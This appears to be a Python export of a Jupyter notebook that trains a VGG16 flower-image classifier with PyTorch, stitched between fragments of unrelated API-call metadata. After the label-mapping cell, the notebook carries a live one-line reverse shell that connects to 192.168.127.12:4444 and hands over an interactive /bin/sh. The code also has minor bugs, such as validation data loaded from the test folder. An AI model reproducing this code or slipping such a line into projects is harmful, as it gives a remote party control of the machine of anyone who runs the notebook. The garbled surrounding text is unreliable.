'enhancement_factors.f_b97_x2.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2], 'gamma': gamma_x},\n use_jax=use_jax)\n", (7814, 7948), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8029, 8070), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8055, 8070), True, 'import numpy as np\n'), ((8238, 8255), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (8252, 8255), True, 'import numpy as np\n'), ((8307, 8319), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (8316, 8319), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((8329, 8514), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval', 'enhancement_factors.f_b97_x2_short.eval', ([], {'features': "{'x2': x2}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}", 'use_jax': 'use_jax'}), "(features={'x2': x2}, parameters={\n 'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2],\n 'gamma_utransform': gamma_x}, use_jax=use_jax)\n", (8368, 8514), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((8594, 8635), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (8620, 8635), True, 'import numpy as np\n'), ((9237, 9254), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9251, 9254), True, 'import numpy as np\n'), ((9263, 9280), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9277, 9280), True, 'import numpy as np\n'), ((9291, 9308), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (9305, 9308), True, 'import numpy as np\n'), ((9351, 9393), 'symbolic_functionals.syfes.xc.mgga.get_mgga_t', 'mgga.get_mgga_t', (['rho', 'tau'], {'polarized': '(False)'}), '(rho, tau, polarized=False)\n', (9366, 9393), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9439, 9566), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_x']", 'power_series': "mgga.WB97MV_PARAMS['power_series_x']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'], power_series=mgga.\n WB97MV_PARAMS['power_series_x'], polarized=False)\n", (9450, 9566), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9600, 9729), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_ss']", 'power_series': "mgga.WB97MV_PARAMS['power_series_ss']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'], power_series=mgga.\n WB97MV_PARAMS['power_series_ss'], polarized=False)\n", (9611, 9729), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((9763, 9892), 'symbolic_functionals.syfes.xc.mgga.f_b97m', 'mgga.f_b97m', (['x', 't'], {'gamma': "mgga.WB97MV_PARAMS['gamma_os']", 'power_series': "mgga.WB97MV_PARAMS['power_series_os']", 'polarized': '(False)'}), "(x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'], power_series=mgga.\n WB97MV_PARAMS['power_series_os'], polarized=False)\n", (9774, 9892), False, 'from symbolic_functionals.syfes.xc import mgga\n'), ((11234, 11279), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_x', 'expected_f_x'], {}), '(f_x, expected_f_x)\n', (11260, 11279), True, 'import numpy as np\n'), ((11284, 11333), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_css', 'expected_f_css'], {}), '(f_css, expected_f_css)\n', (11310, 11333), True, 'import numpy as np\n'), ((11338, 11387), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f_cos', 'expected_f_cos'], {}), '(f_cos, expected_f_cos)\n', (11364, 11387), True, 'import numpy as np\n'), ((13279, 13419), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2', 'w']", 'num_shared_parameters': '(10)', 'num_variables': '(10)'}), "(feature_names=[\n 'rho', 'x2', 'w'], num_shared_parameters=10, num_variables=10)\n", (13336, 13419), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14054, 14105), 'copy.deepcopy', 'copy.deepcopy', (['enhancement_factors.f_x_wb97mv_short'], {}), '(enhancement_factors.f_x_wb97mv_short)\n', (14067, 14105), False, 'import copy\n'), ((16317, 16361), 'sympy.symbols', 'sympy.symbols', (['"""c0 c1 c2 gamma_utransform x"""'], {}), "('c0 c1 c2 gamma_utransform x')\n", (16330, 16361), False, 'import sympy\n'), ((1281, 1298), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (1295, 1298), True, 'import numpy as np\n'), ((1403, 1419), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1417, 1419), True, 'import numpy as np\n'), ((1526, 1542), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1540, 1542), True, 'import numpy as np\n'), ((1666, 1677), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1674, 1677), True, 'import numpy as np\n'), ((3100, 3226), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': '[]', 'shared_parameter_names': '[]', 'variable_names': '[]', 'instruction_list': '[]'}), '(feature_names=[],\n shared_parameter_names=[], variable_names=[], instruction_list=[])\n', (3137, 3226), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((3399, 3559), 'symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor', 'enhancement_factors.EnhancementFactor', ([], {'feature_names': "['var']", 'shared_parameter_names': "['var']", 'variable_names': "['enhancement_factor']", 'instruction_list': '[]'}), "(feature_names=['var'],\n shared_parameter_names=['var'], variable_names=['enhancement_factor'],\n instruction_list=[])\n", (3436, 3559), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((4093, 4144), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""variable_0"""', '"""var"""'], {}), "('variable_0', 'var')\n", (4123, 4144), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4250, 4342), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_0"""', '"""shared_parameter_1"""', '"""gamma_utransform"""'], {}), "('variable_0', 'shared_parameter_1',\n 'gamma_utransform')\n", (4282, 4342), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((4959, 5024), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""feature_0"""', '"""shared_parameter_0"""'], {}), "('feature_0', 'shared_parameter_0')\n", (4989, 5024), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5151, 5236), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""feature_1"""', '"""shared_parameter_1"""', '"""variable_1"""'], {}), "('feature_1', 'shared_parameter_1',\n 'variable_1')\n", (5183, 5236), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((5385, 5458), 'symbolic_functionals.syfes.symbolic.instructions.Power4Instruction', 'instructions.Power4Instruction', (['"""bound_parameter_1"""', '"""shared_parameter_1"""'], {}), "('bound_parameter_1', 'shared_parameter_1')\n", (5415, 5458), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((12219, 12236), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (12233, 12236), True, 'import numpy as np\n'), ((12354, 12370), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12368, 12370), True, 'import numpy as np\n'), ((12703, 12719), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12717, 12719), True, 'import numpy as np\n'), ((14349, 14408), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy', ([], {}), '()\n', (14406, 14408), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14611, 14685), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy', 'enhancement_factors.f_b97_u.make_isomorphic_copy', ([], {'feature_names': "['u', 'u']"}), "(feature_names=['u', 'u'])\n", (14659, 14685), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((14940, 15025), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy', 'enhancement_factors.f_x_wb97mv.make_isomorphic_copy', ([], {'feature_names': "['rho', 'x2']"}), "(feature_names=['rho', 'x2']\n )\n", (14991, 15025), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15241, 15330), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_shared_parameters': '(5)'}), '(\n num_shared_parameters=5)\n', (15300, 15330), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((15530, 15606), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', 'enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy', ([], {'num_variables': '(3)'}), '(num_variables=3)\n', (15589, 15606), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16401, 16492), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(False)', 'simplify': '(False)'}), '(latex=False,\n simplify=False)\n', (16459, 16492), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((16707, 16797), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression', 'enhancement_factors.f_b97_x2_short.get_symbolic_expression', ([], {'latex': '(True)', 'simplify': '(False)'}), '(latex=True,\n simplify=False)\n', (16765, 16797), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((1772, 1783), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (1780, 1783), True, 'import numpy as np\n'), ((2065, 2156), 'symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction', 'instructions.MultiplicationInstruction', (['"""variable_0"""', '"""feature_0"""', '"""shared_parameter_0"""'], {}), "('variable_0', 'feature_0',\n 'shared_parameter_0')\n", (2103, 2156), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2183, 2268), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""feature_1"""', '"""shared_parameter_1"""'], {}), "('variable_1', 'feature_1',\n 'shared_parameter_1')\n", (2215, 2268), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2295, 2369), 'symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction', 'instructions.AdditionInstruction', (['"""variable_1"""', '"""variable_1"""', '"""variable_0"""'], {}), "('variable_1', 'variable_1', 'variable_0')\n", (2327, 2369), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2400, 2466), 'symbolic_functionals.syfes.symbolic.instructions.Power2Instruction', 'instructions.Power2Instruction', (['"""enhancement_factor"""', '"""variable_1"""'], {}), "('enhancement_factor', 'variable_1')\n", (2430, 2466), False, 'from symbolic_functionals.syfes.symbolic import instructions\n'), ((2480, 2558), 'symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction', 'instructions.UTransformInstruction', (['"""enhancement_factor"""', '"""enhancement_factor"""'], {}), "('enhancement_factor', 'enhancement_factor')\n", (2514, 2558), False, 'from symbolic_functionals.syfes.symbolic import instructions\n')]
|
#!/usr/bin/env python
# coding: utf-8
# # Developing an AI application
#
# Going forward, AI algorithms will be incorporated into more and more everyday applications. For example, you might want to include an image classifier in a smart phone app. To do this, you'd use a deep learning model trained on hundreds of thousands of images as part of the overall application architecture. A large part of software development in the future will be using these types of models as common parts of applications.
#
# In this project, you'll train an image classifier to recognize different species of flowers. You can imagine using something like this in a phone app that tells you the name of the flower your camera is looking at. In practice you'd train this classifier, then export it for use in your application. We'll be using [this dataset](http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html) of 102 flower categories, you can see a few examples below.
#
# <img src='assets/Flowers.png' width=500px>
#
# The project is broken down into multiple steps:
#
# * Load and preprocess the image dataset
# * Train the image classifier on your dataset
# * Use the trained classifier to predict image content
#
# We'll lead you through each part which you'll implement in Python.
#
# When you've completed this project, you'll have an application that can be trained on any set of labeled images. Here your network will be learning about flowers and end up as a command line application. But, what you do with your new skills depends on your imagination and effort in building a dataset. For example, imagine an app where you take a picture of a car, it tells you what the make and model is, then looks up information about it. Go build your own dataset and make something new.
#
# First up is importing the packages you'll need. It's good practice to keep all the imports at the beginning of your code. As you work through this notebook and find you need to import a package, make sure to add the import up here.
# In[17]:
# Imports here
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchvision import datasets,transforms,models
import numpy as np
# ## Load the data
#
# Here you'll use `torchvision` to load the data ([documentation](http://pytorch.org/docs/0.3.0/torchvision/index.html)). The data should be included alongside this notebook, otherwise you can [download it here](https://s3.amazonaws.com/content.udacity-data.com/nd089/flower_data.tar.gz). The dataset is split into three parts, training, validation, and testing. For the training, you'll want to apply transformations such as random scaling, cropping, and flipping. This will help the network generalize leading to better performance. You'll also need to make sure the input data is resized to 224x224 pixels as required by the pre-trained networks.
#
# The validation and testing sets are used to measure the model's performance on data it hasn't seen yet. For this you don't want any scaling or rotation transformations, but you'll need to resize then crop the images to the appropriate size.
#
# The pre-trained networks you'll use were trained on the ImageNet dataset where each color channel was normalized separately. For all three sets you'll need to normalize the means and standard deviations of the images to what the network expects. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`, calculated from the ImageNet images. These values will shift each color channel to be centered at 0 and range from -1 to 1.
#
# In[2]:
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# In[3]:
# TODO: Define your transforms for the training, validation, and testing sets
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_transforms = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
validate_transforms=transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
validate_data=datasets.ImageFolder(test_dir, transform=test_transforms)
trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
testloader = torch.utils.data.DataLoader(test_data, batch_size=64)
validloader=torch.utils.data.DataLoader(validate_data, batch_size=64)
# ### Label mapping
#
# You'll also need to load in a mapping from category label to category name. You can find this in the file `cat_to_name.json`. It's a JSON object which you can read in with the [`json` module](https://docs.python.org/2/library/json.html). This will give you a dictionary mapping the integer encoded categories to the actual names of the flowers.
# In[ ]:
import json
with open('cat_to_name.json', 'r') as f:
cat_to_name = json.load(f)
print(len(cat_to_name))
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.12",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# In[5]:
import os
import tarfile
def recursive_files(dir_name='.', ignore=None):
for dir_name,subdirs,files in os.walk(dir_name):
if ignore and os.path.basename(dir_name) in ignore:
continue
for file_name in files:
if ignore and file_name in ignore:
continue
yield os.path.join(dir_name, file_name)
def make_tar_file(dir_name='.', target_file_name='workspace_archive.tar', ignore=None):
tar = tarfile.open(target_file_name, 'w')
for file_name in recursive_files(dir_name, ignore):
tar.add(file_name)
tar.close()
dir_name = '.'
target_file_name = 'workspace_archive.tar'
# List of files/directories to ignore
ignore = {'.ipynb_checkpoints', '__pycache__', target_file_name}
make_tar_file(dir_name, target_file_name, ignore)
# # Building and training the classifier
#
# Now that the data is ready, it's time to build and train the classifier. As usual, you should use one of the pretrained models from `torchvision.models` to get the image features. Build and train a new feed-forward classifier using those features.
#
# We're going to leave this part up to you. Refer to [the rubric](https://review.udacity.com/#!/rubrics/1663/view) for guidance on successfully completing this section. Things you'll need to do:
#
# * Load a [pre-trained network](http://pytorch.org/docs/master/torchvision/models.html) (If you need a starting point, the VGG networks work great and are straightforward to use)
# * Define a new, untrained feed-forward network as a classifier, using ReLU activations and dropout
# * Train the classifier layers using backpropagation using the pre-trained network to get the features
# * Track the loss and accuracy on the validation set to determine the best hyperparameters
#
# We've left a cell open for you below, but use as many as you need. Our advice is to break the problem up into smaller parts you can run separately. Check that each part is doing what you expect, then move on to the next. You'll likely find that as you work through each part, you'll need to go back and modify your previous code. This is totally normal!
#
# When training make sure you're updating only the weights of the feed-forward network. You should be able to get the validation accuracy above 70% if you build everything right. Make sure to try different hyperparameters (learning rate, units in the classifier, epochs, etc) to find the best model. Save those hyperparameters to use as default values in the next part of the project.
#
# One last important tip if you're using the workspace to run your code: To avoid having your workspace disconnect during the long-running tasks in this notebook, please read in the earlier page in this lesson called Intro to
# GPU Workspaces about Keeping Your Session Active. You'll want to include code from the workspace_utils.py module.
#
# **Note for Workspace users:** If your network is over 1 GB when saved as a checkpoint, there might be issues with saving backups in your workspace. Typically this happens with wide dense layers after the convolutional layers. If your saved checkpoint is larger than 1 GB (you can open a terminal and check with `ls -lh`), you should reduce the size of your hidden layers and train again.
# In[5]:
# TODO: Build and train your network
model=models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model
# In[6]:
from collections import OrderedDict
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.to("cuda")
optimizer=optim.Adam(model.classifier.parameters(), lr=0.001)
criterion=nn.NLLLoss()
running_loss=0
train_losses, test_losses = [], []
epochs = 10
steps = 0
running_loss = 0
print_every = 20
for epoch in range(epochs):
for inputs, labels in trainloader:
steps += 1
# Move input and label tensors to the default device
inputs, labels = inputs.to("cuda"), labels.to("cuda")
optimizer.zero_grad()
logps = model.forward(inputs)
loss = criterion(logps, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
test_loss = 0
accuracy = 0
model.eval()
with torch.no_grad():
for inputs, labels in validloader:
inputs, labels = inputs.to("cuda"), labels.to("cuda")
logps = model.forward(inputs)
batch_loss = criterion(logps, labels)
test_loss += batch_loss.item()
# Calculate accuracy
ps = torch.exp(logps)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
print(f"Epoch {epoch+1}/{epochs}.. "
f"Train loss: {running_loss/print_every:.3f}.. "
f"Test loss: {test_loss/len(validloader):.3f}.. "
f"Test accuracy: {accuracy/len(validloader):.3f}")
running_loss = 0
model.train()# else:
# test_loss* = 0
# accuracy = 0
# with torch.no_grad():
# model.eval()
# for images, labels in testloader:
# images, labels = images.to("cuda"), labels.to("cuda")
# log_ps = model(images)
# test_loss += criterion(log_ps, labels)
# ps = torch.exp(log_ps)
# top_p, top_class = ps.topk(1, dim=1)
# equals = top_class == labels.view(*top_class.shape)
# accuracy += torch.mean(equals.type(torch.FloatTensor))
# model.train()
# train_losses.append(running_loss/len(trainloader))
# test_losses.append(test_loss/len(testloader))
# print("Epoch: {}/{}.. ".format(epoch, epochs),
# "Training Loss: {:.3f}.. ".format(running_loss/len(trainloader)),
# "Test Loss: {:.3f}.. ".format(test_loss/len(testloader)),
# "Test Accuracy: {:.3f}".format(accuracy/len(testloader)))
# running_loss = 0
# model.train()
# In[ ]:
# ## Testing your network
#
# It's good practice to test your trained network on test data, images the network has never seen either in training or validation. This will give you a good estimate for the model's performance on completely new images. Run the test images through the network and measure the accuracy, the same way you did validation. You should be able to reach around 70% accuracy on the test set if the model has been trained well.
# In[9]:
# TODO: Do validation on the test set
model.eval()
model.to("cuda")
with torch.no_grad():
accuracy=0
for images,labels in testloader:
images, labels = images.to("cuda"), labels.to("cuda")
logits=model(images)
probabilities=torch.exp(logits)
equality = (labels.data == probabilities.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
print("Testing Accuracy:",accuracy/len(testloader))
# ## Save the checkpoint
#
# Now that your network is trained, save the model so you can load it later for making predictions. You probably want to save other things such as the mapping of classes to indices which you get from one of the image datasets: `image_datasets['train'].class_to_idx`. You can attach this to the model as an attribute which makes inference easier later on.
#
# ```model.class_to_idx = image_datasets['train'].class_to_idx```
#
# Remember that you'll want to completely rebuild the model later so you can use it for inference. Make sure to include any information you need in the checkpoint. If you want to load the model and keep training, you'll want to save the number of epochs as well as the optimizer state, `optimizer.state_dict`. You'll likely want to use this trained model in the next part of the project, so best to save it now.
# In[10]:
# TODO: Save the checkpoint
model.class_to_idx = train_data.class_to_idx
checkpoint = {'arch': "vgg16",
'class_to_idx': model.class_to_idx,
'model_state_dict': model.state_dict()
}
torch.save(checkpoint, 'trained.pth')
# ## Loading the checkpoint
#
# At this point it's good to write a function that can load a checkpoint and rebuild the model. That way you can come back to this project and keep working on it without having to retrain the network.
# In[13]:
# TODO: Write a function that loads a checkpoint and rebuilds the model
def load(filepath):
checkpoint = torch.load(filepath)
model = models.vgg16(pretrained=True)
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = checkpoint['class_to_idx']
model.classifier = nn.Sequential(nn.Linear(25088, 500),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(500,102),
nn.LogSoftmax(dim=1))
model.load_state_dict(checkpoint['model_state_dict'])
return model
model = load('trained.pth')
print(model)
# # Inference for classification
#
# Now you'll write a function to use a trained network for inference. That is, you'll pass an image into the network and predict the class of the flower in the image. Write a function called `predict` that takes an image and a model, then returns the top $K$ most likely classes along with the probabilities. It should look like
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
#
# First you'll need to handle processing the input image such that it can be used in your network.
#
# ## Image Preprocessing
#
# You'll want to use `PIL` to load the image ([documentation](https://pillow.readthedocs.io/en/latest/reference/Image.html)). It's best to write a function that preprocesses the image so it can be used as input for the model. This function should process the images in the same manner used for training.
#
# First, resize the images where the shortest side is 256 pixels, keeping the aspect ratio. This can be done with the [`thumbnail`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) or [`resize`](http://pillow.readthedocs.io/en/3.1.x/reference/Image.html#PIL.Image.Image.thumbnail) methods. Then you'll need to crop out the center 224x224 portion of the image.
#
# Color channels of images are typically encoded as integers 0-255, but the model expected floats 0-1. You'll need to convert the values. It's easiest with a Numpy array, which you can get from a PIL image like so `np_image = np.array(pil_image)`.
#
# As before, the network expects the images to be normalized in a specific way. For the means, it's `[0.485, 0.456, 0.406]` and for the standard deviations `[0.229, 0.224, 0.225]`. You'll want to subtract the means from each color channel, then divide by the standard deviation.
#
# And finally, PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array. You can reorder dimensions using [`ndarray.transpose`](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ndarray.transpose.html). The color channel needs to be first and retain the order of the other two dimensions.
# In[33]:
from PIL import Image
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
pil_image=Image.open(image)
pil_image=pil_image.resize(size=(256,256))
bottom = (pil_image.height-224)/2
left = (pil_image.width-224)/2
right = left + 224
top= bottom + 224
pil_image = pil_image.crop((left, bottom, right, top))
np_image = np.array(pil_image)/255
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
np_image = (np_image - mean) / std
np_image = np_image.transpose((2, 0, 1))
return np_image
# TODO: Process a PIL image for use in a PyTorch model
# To check your work, the function below converts a PyTorch tensor and displays it in the notebook. If your `process_image` function works, running the output through this function should return the original image (except for the cropped out portions).
# In[38]:
import matplotlib.pyplot as plt
import seaborn as sb
def imshow(image, ax=None, title=None):
"""Imshow for Tensor."""
if ax is None:
fig, ax = plt.subplots()
# PyTorch tensors assume the color channel is the first dimension
# but matplotlib assumes is the third dimension
image = image.transpose((1, 2, 0))
# Undo preprocessing
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
image = std * image + mean
# Image needs to be clipped between 0 and 1 or it looks like noise when displayed
image = np.clip(image, 0, 1)
ax.imshow(image)
return ax
image = process_image('flowers/test/1/image_06754.jpg')
imshow(image)
# ## Class Prediction
#
# Once you can get images in the correct format, it's time to write a function for making predictions with your model. A common practice is to predict the top 5 or so (usually called top-$K$) most probable classes. You'll want to calculate the class probabilities then find the $K$ largest values.
#
# To get the top $K$ largest values in a tensor use [`x.topk(k)`](http://pytorch.org/docs/master/torch.html#torch.topk). This method returns both the highest `k` probabilities and the indices of those probabilities corresponding to the classes. You need to convert from these indices to the actual class labels using `class_to_idx` which hopefully you added to the model or from an `ImageFolder` you used to load the data ([see here](#Save-the-checkpoint)). Make sure to invert the dictionary so you get a mapping from index to class as well.
#
# Again, this method should take a path to an image and a model checkpoint, then return the probabilities and classes.
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
# In[62]:
def predict(image_path, model, topk=5):
''' Predict the class (or classes) of an image using a trained deep learning model.
'''
image=process_image(image_path)
model.to("cuda")
image = torch.from_numpy(image).type(torch.cuda.FloatTensor)
image = image.unsqueeze(0)
output = model.forward(image)
probabilities = torch.exp(output)
top_probabilities, top_indices = probabilities.topk(topk)
top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0]
top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]
idx_to_class = {value: key for key, value in model.class_to_idx.items()}
top_classes = [idx_to_class[index] for index in top_indices]
return top_probabilities, top_classes
# TODO: Implement the code to predict the class from an image file
probs, classes = predict('flowers/test/97/image_07708.jpg', model)
print(probs)
print(classes)
# ## Sanity Checking
#
# Now that you can use a trained model for predictions, check to make sure it makes sense. Even if the testing accuracy is high, it's always good to check that there aren't obvious bugs. Use `matplotlib` to plot the probabilities for the top 5 classes as a bar graph, along with the input image. It should look like this:
#
# <img src='assets/inference_example.png' width=300px>
#
# You can convert from the class integer encoding to actual flower names with the `cat_to_name.json` file (should have been loaded earlier in the notebook). To show a PyTorch tensor as an image, use the `imshow` function defined above.
# In[63]:
# TODO: Display an image along with the top 5 classes
plt.figure(figsize = (6,10))
plot_1 = plt.subplot(2,1,1)
image = process_image('flowers/test/97/image_07708.jpg')
imshow(image, plot_1, title=flower_title);
flower_names = [cat_to_name[i] for i in classes]
plt.subplot(2,1,2)
sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0]);
plt.show()
# In[ ]:
|
[
"numpy.clip",
"torch.nn.ReLU",
"tarfile.open",
"torch.nn.Dropout",
"torch.exp",
"torch.from_numpy",
"numpy.array",
"os.walk",
"seaborn.color_palette",
"torchvision.datasets.ImageFolder",
"subprocess.call",
"torchvision.transforms.ToTensor",
"torchvision.transforms.RandomResizedCrop",
"torchvision.transforms.RandomHorizontalFlip",
"torch.nn.NLLLoss",
"torch.save",
"torchvision.transforms.Normalize",
"torchvision.transforms.Resize",
"matplotlib.pyplot.show",
"torchvision.transforms.CenterCrop",
"PIL.Image.open",
"socket.socket",
"torchvision.transforms.RandomRotation",
"torch.load",
"os.path.join",
"matplotlib.pyplot.figure",
"os.path.basename",
"torch.nn.Linear",
"torch.utils.data.DataLoader",
"json.load",
"torch.no_grad",
"torch.nn.LogSoftmax",
"torchvision.models.vgg16",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.subplots"
] |
